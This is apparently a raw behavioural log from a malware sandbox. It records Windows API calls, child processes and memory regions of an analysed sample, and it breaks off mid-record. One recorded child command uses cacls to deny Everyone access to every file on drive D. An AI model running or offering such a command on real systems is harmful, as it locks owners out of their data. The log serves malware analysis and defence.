__set_app_type (_Type=0x1) [0036.632] __p__fmode () returned 0x76ea1768 [0036.632] __p__commode () returned 0x76ea176c [0036.632] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0036.632] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0036.633] GetCurrentThreadId () returned 0xbe8 [0036.633] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbe8) returned 0x30 [0036.633] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.633] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0036.633] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.634] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0036.634] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x94fb74 | out: phkResult=0x94fb74*=0x0) returned 0x2 [0036.635] VirtualQuery (in: lpAddress=0x94fb83, lpBuffer=0x94fb1c, dwLength=0x1c | out: lpBuffer=0x94fb1c*(BaseAddress=0x94f000, AllocationBase=0x850000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.635] VirtualQuery (in: lpAddress=0x850000, lpBuffer=0x94fb1c, dwLength=0x1c | out: lpBuffer=0x94fb1c*(BaseAddress=0x850000, AllocationBase=0x850000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0036.635] VirtualQuery (in: lpAddress=0x851000, lpBuffer=0x94fb1c, dwLength=0x1c | out: lpBuffer=0x94fb1c*(BaseAddress=0x851000, AllocationBase=0x850000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0036.635] VirtualQuery (in: lpAddress=0x853000, lpBuffer=0x94fb1c, dwLength=0x1c | out: lpBuffer=0x94fb1c*(BaseAddress=0x853000, AllocationBase=0x850000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.635] VirtualQuery (in: lpAddress=0x950000, lpBuffer=0x94fb1c, dwLength=0x1c | out: lpBuffer=0x94fb1c*(BaseAddress=0x950000, AllocationBase=0x950000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0036.635] GetConsoleOutputCP () returned 0x1b5 [0036.635] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.635] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0036.635] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.635] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.635] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.635] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.635] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.635] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.635] GetEnvironmentStringsW () returned 0xb94058* [0036.635] FreeEnvironmentStringsA (penv="=") returned 1 [0036.635] GetEnvironmentStringsW () returned 0xb94058* [0036.636] FreeEnvironmentStringsA (penv="=") returned 1 [0036.636] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x94eac4 | out: phkResult=0x94eac4*=0x40) returned 0x0 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x0, lpData=0x94ead0*=0x0, lpcbData=0x94eac8*=0x1000) returned 0x2 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x4, lpData=0x94ead0*=0x1, lpcbData=0x94eac8*=0x4) returned 0x0 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x0, lpData=0x94ead0*=0x1, lpcbData=0x94eac8*=0x1000) returned 0x2 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x4, lpData=0x94ead0*=0x0, lpcbData=0x94eac8*=0x4) returned 0x0 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x4, lpData=0x94ead0*=0x40, lpcbData=0x94eac8*=0x4) returned 0x0 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x4, lpData=0x94ead0*=0x40, lpcbData=0x94eac8*=0x4) returned 0x0 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x0, lpData=0x94ead0*=0x40, lpcbData=0x94eac8*=0x1000) returned 0x2 [0036.636] RegCloseKey (hKey=0x40) returned 0x0 [0036.636] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x94eac4 | out: phkResult=0x94eac4*=0x40) returned 0x0 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x0, lpData=0x94ead0*=0x40, lpcbData=0x94eac8*=0x1000) returned 0x2 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x4, lpData=0x94ead0*=0x1, lpcbData=0x94eac8*=0x4) returned 0x0 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x0, lpData=0x94ead0*=0x1, lpcbData=0x94eac8*=0x1000) returned 0x2 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x4, lpData=0x94ead0*=0x0, lpcbData=0x94eac8*=0x4) returned 0x0 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x4, lpData=0x94ead0*=0x9, lpcbData=0x94eac8*=0x4) returned 0x0 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x4, lpData=0x94ead0*=0x9, lpcbData=0x94eac8*=0x4) returned 0x0 [0036.636] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x94eacc, lpData=0x94ead0, lpcbData=0x94eac8*=0x1000 | out: lpType=0x94eacc*=0x0, lpData=0x94ead0*=0x9, lpcbData=0x94eac8*=0x1000) returned 0x2 [0036.636] RegCloseKey (hKey=0x40) returned 0x0 [0036.636] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004f [0036.636] srand (_Seed=0x5aa5004f) [0036.636] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.636] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.636] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.636] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb94060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0036.637] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.637] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.637] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0036.637] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.637] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0036.637] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0036.637] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0036.637] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0036.637] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0036.637] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0036.637] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0036.637] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0036.637] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0036.637] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x94f8a4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x94f8a4, lpFilePart=0x94f8a0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x94f8a0*="Desktop") returned 0x1c [0036.637] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.637] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x94f620 | out: lpFindFileData=0x94f620) returned 0xb94270 [0036.637] FindClose (in: hFindFile=0xb94270 | out: hFindFile=0xb94270) returned 1 [0036.637] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x94f620 | out: lpFindFileData=0x94f620) returned 0xb94270 [0036.637] FindClose (in: hFindFile=0xb94270 | out: hFindFile=0xb94270) returned 1 [0036.637] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0036.637] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x94f620 | out: lpFindFileData=0x94f620) returned 0xb94270 [0036.637] FindClose (in: hFindFile=0xb94270 | out: hFindFile=0xb94270) returned 1 [0036.638] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.638] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0036.638] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0036.638] GetEnvironmentStringsW () returned 0xb960b0* [0036.638] FreeEnvironmentStringsA (penv="=") returned 1 [0036.638] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.638] GetConsoleOutputCP () returned 0x1b5 [0036.638] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.638] GetUserDefaultLCID () returned 0x409 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x94f9d0, cchData=128 | out: lpLCData="0") returned 2 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x94f9d0, cchData=128 | out: lpLCData="0") returned 2 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x94f9d0, cchData=128 | out: lpLCData="1") returned 2 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0036.639] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0036.639] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0036.640] GetConsoleTitleW (in: lpConsoleTitle=0xb94d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.640] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.640] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0036.640] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0036.640] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0036.641] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.641] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.641] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.641] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.641] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.641] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.641] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.641] GetConsoleTitleW (in: lpConsoleTitle=0x94f6c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.642] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.642] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.642] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.642] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.642] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.642] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.642] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.642] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.642] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.642] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.643] _vsnwprintf (in: _Buffer=0x12c8840, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x94f67c | out: _Buffer="y\r\n") returned 3 [0036.643] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.643] GetFileType (hFile=0x28) returned 0x3 [0036.643] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.643] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="y\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\r\n", lpUsedDefaultChar=0x0) returned 4 [0036.643] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x94f66c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0x94f66c*=0x3, lpOverlapped=0x0) returned 1 [0036.643] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.643] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.643] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.643] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.643] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.643] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.643] SetConsoleInputExeNameW () returned 0x1 [0036.643] GetConsoleOutputCP () returned 0x1b5 [0036.644] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.644] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.644] exit (_Code=0) Process: id = "27" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0xc68a000" os_pid = "0xb44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "cacls \"D:\\*.*\" /e /d everyone" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1072 start_va = 0x4d0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1073 start_va = 0x4f0000 end_va = 0x4f1fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1074 start_va = 0x500000 end_va = 0x50efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 1075 start_va = 0x510000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1076 start_va = 0x550000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1077 start_va = 0x590000 end_va = 0x593fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1078 start_va = 0x5a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1079 start_va = 0x5b0000 end_va = 0x5b1fff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1080 start_va = 0xb30000 end_va = 0xb39fff entry_point = 0xb30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 1081 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1082 start_va = 0x7e800000 end_va = 0x7e822fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e800000" filename = "" Region: id = 1083 start_va = 0x7e828000 end_va = 0x7e828fff entry_point = 0x0 region_type = private name = "private_0x000000007e828000" filename = "" Region: id = 1084 start_va = 0x7e82a000 end_va = 0x7e82afff entry_point = 0x0 region_type = private name = "private_0x000000007e82a000" filename = "" Region: id = 1085 start_va = 0x7e82d000 end_va = 0x7e82ffff entry_point = 0x0 region_type = private name = "private_0x000000007e82d000" filename = "" Region: id = 1086 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1087 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1088 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1089 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1103 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1104 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1105 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1106 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1107 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 1108 start_va = 0x4e0000 end_va = 0x4e3fff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1109 start_va = 0x4f0000 end_va = 0x4f3fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1110 start_va = 0x650000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1111 start_va = 0x750000 end_va = 0x7cdfff entry_point = 0x750000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1112 start_va = 0x960000 end_va = 0x96ffff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 1113 start_va = 0xb40000 end_va = 0xe14fff entry_point = 0xb40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1114 start_va = 0x747f0000 end_va = 0x74814fff entry_point = 0x747f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1115 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1116 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1117 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1118 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1119 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1120 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1121 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1122 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1123 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1124 start_va = 0x7e700000 end_va = 0x7e7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e700000" filename = "" Thread: id = 29 os_tid = 0xb3c Process: id = "28" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x13318000" os_pid = "0x6b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1125 start_va = 0x320000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1126 start_va = 0x340000 end_va = 0x341fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1127 start_va = 0x350000 end_va = 0x35efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 1128 start_va = 0x360000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1129 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1130 start_va = 0x4a0000 end_va = 0x4a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 1131 start_va = 0x4b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1132 start_va = 0x4c0000 end_va = 0x4c1fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1133 start_va = 